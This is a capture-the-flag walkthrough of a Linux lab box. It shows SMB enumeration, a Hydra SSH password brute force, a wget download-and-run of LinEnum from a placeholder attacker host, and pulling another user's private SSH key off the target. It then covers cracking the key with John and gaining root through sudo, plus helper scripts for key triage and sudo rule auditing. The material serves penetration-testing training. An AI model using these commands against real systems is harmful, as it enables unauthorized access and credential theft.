SSH Key Exploitation and SMB Recon: A CTF Walkthrough
A real-world-style Linux box. This one challenged me to use sharp enumeration, smart pivots, and creative thinking to gain and escalate access across multiple vectors.
Anonymous | Linux
Difficulty: Medium
Tags: SMB, SSH brute force, SSH key cracking, privesc, sudo
Tools Used: Nmap, smbmap, smbclient, Hydra, LinEnum, ssh2john, John the Ripper
This box is the kind of grind OSCP is built on: recon, a password brute force, a stolen key, and a good old-fashioned sudo -l. It’s not flashy. It’s precise. Each step leads to the next, if you’re paying attention. SMB drops usernames, brute force gets you in, and another user’s home directory hands you root on a silver platter. 🔐
Initial Recon: Laying the Groundwork
Every hunt starts with recon. I ran a full Nmap scan to surface the attack surface:
nmap -sC -sV -T4 10.10.44.87
Services lit up:
22/tcp — SSH (OpenSSH 7.2p2)
80/tcp — HTTP (Apache 2.4.18)
139/445 — SMB (Samba smbd 4.3.11)
8009 — AJP
8080 — HTTP proxy
With multiple web services and SMB live, it was time to pick a direction.
SMB Enumeration: First Foothold
Checked for open shares with smbmap:
smbmap -H 10.10.44.87
Result:
Anonymous    READ ONLY
IPC$         NO ACCESS
Connected to the anonymous share:
smbclient //10.10.44.87/Anonymous
Found staff.txt, which lists two users, jan and kay, along with a warning about uploading non-work-related files.
Wording like that sometimes means there is an upload feature somewhere in the app. Logged for later.
Web App Analysis: A Red Herring
Inspected the Apache site and found a reference to version 2.5.12, which does not match the 2.4.18 banner Nmap reported, so it stood out. A quick searchsploit turned up an exploit, and I tried it.
No luck. Dead end.
Rather than burn time on an unreliable web exploit, I pivoted to a faster win: brute forcing SSH with the usernames from staff.txt.
SSH Brute Force: Breaking in as Jan
Launched Hydra against jan (Hydra itself warns that many sshd configurations cap parallel connections, so -t 4 is the safer task count if the run starts throwing connection errors):
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.44.87
Hit:
jan:armando
Logged in:
ssh jan@10.10.44.87
First blood:
cat user.txt
Dropped LinEnum to scout for privesc:
cd /dev/shm
wget http://<attacker-ip>:31337/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
SSH Keys Discovered: Eyes on Kay
LinEnum flagged a .ssh directory under /home/kay that jan could read, and that readability is the real misconfiguration here. Peeked inside:
ls -la /home/kay/.ssh
Private key found: id_rsa
Served it straight off the target with Python’s built-in web server (the box answered on 10.10.81.85 from this point on):
cd /home/kay/.ssh
python3 -m http.server 5555
Then pulled it down on the attacking machine:
wget http://10.10.81.85:5555/id_rsa
Cracking the SSH Key
Converted the private key for John:
ssh2john id_rsa > id_rsa_for_john.txt
john id_rsa_for_john.txt --wordlist=/usr/share/wordlists/rockyou.txt
Cracked passphrase:
b-----x
Logged in as kay with the cracked passphrase, after a chmod 600 on the downloaded copy, since ssh refuses to use a private key that is group- or world-readable:
ssh -i id_rsa kay@10.10.81.85
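Before reaching for ssh2john it is worth knowing whether the key is passphrase-protected at all, and fixing the file mode that makes ssh reject a freshly downloaded key. The classifier below is an added example, not part of the original walkthrough; it assumes GNU coreutils (base64 -d, head -c) and a POSIX shell. The sample files it builds are constructed headers, not real keys: the base64 prefixes are the standard OpenSSH "openssh-key-v1" header with either none/none or aes256-ctr/bcrypt as cipher and KDF.

```shell
#!/bin/sh
# triage_key FILE: prints one of
#   pem-encrypted | pem-plain | openssh-encrypted | openssh-plain | unknown
# so you know whether a key needs ssh2john + john before `ssh -i FILE`, and
# fixes the 0600 mode ssh insists on (a 0644 copy straight from wget is
# rejected with "UNPROTECTED PRIVATE KEY FILE"). Assumes GNU coreutils.
triage_key() {
    key="$1"
    [ -r "$key" ] || { echo unknown; return 1; }
    chmod 600 "$key" 2>/dev/null || :
    first=$(head -n 1 "$key")
    case "$first" in
        '-----BEGIN OPENSSH PRIVATE KEY-----')
            # Native OpenSSH format: the base64 body decodes to the magic
            # "openssh-key-v1\0" followed by two length-prefixed strings,
            # ciphername and kdfname. Both are "none" only for a key stored
            # in the clear; 40 bytes cover that whole prefix. Non-printable
            # bytes are turned into '.' so a glob can match them.
            hdr=$(sed '1d;$d' "$key" | tr -d '\n' | base64 -d 2>/dev/null |
                  head -c 40 | tr -c '[:print:]' '.')
            case "$hdr" in
                'openssh-key-v1.....none....none'*) echo openssh-plain ;;
                'openssh-key-v1'*)                  echo openssh-encrypted ;;
                *)                                  echo unknown; return 1 ;;
            esac ;;
        '-----BEGIN ENCRYPTED PRIVATE KEY-----')
            # PKCS#8 with this header is always passphrase-protected.
            echo pem-encrypted ;;
        '-----BEGIN '*' PRIVATE KEY-----')
            # Legacy PEM (RSA/EC/DSA): an encrypted key carries a Proc-Type
            # header before the body; a plain one goes straight to base64.
            if grep -q '^Proc-Type: 4,ENCRYPTED' "$key"; then
                echo pem-encrypted
            else
                echo pem-plain
            fi ;;
        *)  echo unknown; return 1 ;;
    esac
}

# mk_samples DIR: writes four constructed key files (headers only, not real
# keys) so the classifier can be exercised offline. The OpenSSH bodies are
# the base64 of "openssh-key-v1\0" + cipher + KDF names and nothing else.
mk_samples() {
    dir="$1"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' \
        'Proc-Type: 4,ENCRYPTED' \
        'DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF' '' \
        'AAAA' '-----END RSA PRIVATE KEY-----' > "$dir/pem_enc"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'AAAA' \
        '-----END RSA PRIVATE KEY-----' > "$dir/pem_plain"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
        'b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQ==' \
        '-----END OPENSSH PRIVATE KEY-----' > "$dir/ossh_plain"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
        'b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0' \
        '-----END OPENSSH PRIVATE KEY-----' > "$dir/ossh_enc"
}

# Usage on the attacking box: triage_key ./id_rsa
demo_triage() {
    d=$(mktemp -d)
    mk_samples "$d"
    for f in pem_enc pem_plain ossh_plain ossh_enc; do
        printf '%-11s %s\n' "$f" "$(triage_key "$d/$f")"
    done
    rm -rf "$d"
}
demo_triage
```

A "plain" verdict means ssh -i works immediately and john is wasted effort; an "encrypted" one means the ssh2john step above is the next move. The chmod happens first on purpose, so the key is ready for ssh either way.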
Privilege Escalation via Sudo
Found backup_password.txt in kay’s home. A plaintext password on its own is just a note; paired with sudo rights it is the last piece.
Checked permissions:
sudo -l
Jackpot:
(ALL : ALL) ALL
Unrestricted sudo. There is no NOPASSWD tag, so sudo prompts for kay’s own password, which is where backup_password.txt comes in. Root at no further cost.
Final move:
sudo cat /root/flag.txt
Owned.
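Reading sudo -l by eye works for one line, but on a box with a dozen rules it helps to have the output triaged: a bare ALL is game over, a NOPASSWD entry for an editor or interpreter is nearly as good, and the rest needs a manual look. The script below is an added example, not from the original walkthrough; the "shellish" list is a small, deliberately partial set of binaries known to break out to a shell (the kind catalogued by GTFOBins), and the sample sudo -l output is constructed for a hypothetical user, not captured from the box.

```shell
#!/bin/sh
# audit_sudo: read `sudo -l` output on stdin and print one finding per rule.
#   CRITICAL  the rule is a bare ALL (run anything as the listed user)
#   HIGH      a listed binary can spawn a shell or read/write arbitrary files
#   INFO      anything else, still worth a manual look
# Each finding also notes whether sudo will ask for a password (PASSWD)
# or not (NOPASSWD).
audit_sudo() {
    awk '
    BEGIN {
        # Small, deliberately partial list of binaries that break out to a
        # shell or give arbitrary file access when run as root. Extend it.
        n = split("vim vi nano less more man find awk python python3 perl bash sh env tar cp mv tee dd", s, " ")
        for (i = 1; i <= n; i++) shellish[s[i]] = 1
    }
    # Rule lines are indented and start with the run-as spec "(user : group)".
    /^[ \t]*\(/ {
        rule = $0
        sub(/^[ \t]+/, "", rule)
        tag = (rule ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
        cmds = rule
        sub(/^\([^)]*\)[ \t]*/, "", cmds)                    # drop "(user : group)"
        sub(/^(NOPASSWD|PASSWD|SETENV|NOSETENV):[ \t]*/, "", cmds)
        if (cmds == "ALL") { print "CRITICAL " tag " unrestricted: " rule; next }
        level = "INFO"
        m = split(cmds, list, ", *")                         # one rule may list several commands
        for (i = 1; i <= m; i++) {
            path = list[i]; sub(/[ \t].*/, "", path)         # command without its arguments
            base = path;    sub(/.*\//, "", base)            # basename
            if (base in shellish) level = "HIGH"
        }
        print level " " tag ": " rule
    }'
}

# Constructed `sudo -l` output for a hypothetical user, not captured from the
# box, covering each outcome the classifier produces.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for kay on this host:
    env_reset, mail_badpass

User kay may run the following commands on this host:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/vim
    (root) /bin/systemctl restart nginx
    (root) /bin/systemctl restart nginx, /usr/bin/find /var/log -name *.log
EOF
}

# Usage on a target: sudo -l 2>/dev/null | audit_sudo
sample_sudo_l | audit_sudo
```

The PASSWD tag is the caveat for this box: (ALL : ALL) ALL is only useful once you hold the user’s password, which is exactly why a stray backup_password.txt mattered. A HIGH entry with NOPASSWD would have been root with no password at all.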
Summary / Review
Anonymous was a chain of small wins:
Foothold:
SMB gave up usernames
Hydra cracked Jan’s SSH password
SSH ➤ user flag
Pivot:
LinEnum ➤ SSH key in kay’s .ssh
Cracked with ssh2john + John
SSH login as Kay
Root:
sudo -l showed full permissions
Escalated to root without resistance
Command Recap
nmap -sC -sV -T4 10.10.44.87
smbmap -H 10.10.44.87
smbclient //10.10.44.87/Anonymous
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.44.87
ssh jan@10.10.44.87
wget http://<attacker-ip>:31337/LinEnum.sh && chmod +x LinEnum.sh && ./LinEnum.sh
cd /home/kay/.ssh && python3 -m http.server 5555
wget http://10.10.81.85:5555/id_rsa
ssh2john id_rsa > id_rsa_for_john.txt
john id_rsa_for_john.txt --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i id_rsa kay@10.10.81.85
sudo -l
sudo cat /root/flag.txt
Final Thoughts
Enum gave us usernames
Brute force gave us a password
A home directory gave us a key
Sudo gave us root
No fancy 0days. Just sharp tools and sharper instincts.
Another one rooted. On to the next.